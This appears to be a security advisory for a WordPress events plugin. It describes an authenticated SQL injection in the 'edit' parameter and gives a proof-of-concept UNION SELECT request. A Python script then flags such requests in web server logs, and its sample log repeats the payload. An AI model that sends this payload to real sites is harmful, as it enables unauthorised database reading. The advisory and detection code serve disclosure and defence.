The plugin does not sanitise, validate or escape the edit GET parameter before using it in a SQL statement when editing events, leading to an authenticated SQL injection issue. Other SQL injections are also present in the plugin.
GET /wp-admin/admin.php?page=events&edit=-4292%20UNION%20ALL%20SELECT%20user(),user(),current_user()-- HTTP/1.1
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close
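
For reviewing web server logs for requests of the shape shown above, the following is an added example, not code from the advisory or from the plugin. It assumes combined-format access logs and that a legitimate edit value is a plain numeric event ID; the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (combined log format), not real traffic.
# The second line carries the request from the advisory's proof of concept.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /wp-admin/admin.php?page=events&edit=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /wp-admin/admin.php?page=events&edit=-4292%20UNION%20ALL%20SELECT'
    '%20user(),user(),current_user()-- HTTP/1.1" 200 5300',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /wp-admin/admin.php?page=other&edit=abc HTTP/1.1" 200 900',
    'truncated or malformed line',
]

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate edit value is a non-negative integer event ID.
VALID_ID = re.compile(r"[0-9]+")


def suspicious_edit_requests(lines):
    """Return (client_ip, decoded_edit_value) for every request to the
    events admin page whose edit parameter is not a plain integer."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # skip lines that do not contain a request line
        url = urlsplit(match.group(1))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes values, so %20 and + become spaces
        params = parse_qs(url.query)
        if "events" not in params.get("page", []):
            continue
        for value in params.get("edit", []):
            if not VALID_ID.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_edit_requests(SAMPLE_LOG):
        print(f"{ip}\tedit={value!r}")
```

Because the issue is authenticated, matching entries should be correlated with the admin session that issued them.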